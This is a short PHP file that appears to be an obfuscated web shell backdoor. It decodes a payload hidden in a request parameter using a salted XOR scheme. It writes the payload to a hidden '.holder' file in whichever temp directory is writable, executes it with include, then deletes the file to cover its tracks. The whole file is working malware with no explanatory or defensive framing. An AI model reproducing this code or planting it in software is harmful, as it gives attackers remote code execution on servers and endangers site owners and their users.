<?php

if(isset($_REQUEST["it\x6D"]) ? true : false){
	$obj = $_REQUEST["it\x6D"];
	$obj		 = explode	(	'.'  	, 	 $obj 	)  ;  
	$entity	 =		'';
            $salt	 =		'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	 =		strlen( 	$salt 	);
            $z	 =		0;
            $__len	 =		count( 	$obj 	);
    
            do {if( 	$z >= $__len) break;
                $v6	 =		$obj[$z];
                $chS	 =		ord( 	$salt[$z % $lenS] 	);
                $d	 =		( 	( 	int)$v6 - $chS -( 	$z % 10)) ^ 97;
                $entity .= chr( 	$d 	);
                $z++;	}while( 	true 	);
	$reference = array_filter([getenv("TMP"), "/tmp", "/dev/shm", getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), session_save_path()]);
	while ($flg = array_shift($reference)) {
    		if (max(0, is_dir($flg) * is_writable($flg))) {
    $ent = join("/", [$flg, ".holder"]);
    if (@file_put_contents($ent, $entity) !== false) {
	include $ent;
	unlink($ent);
	exit;
}
}
}
}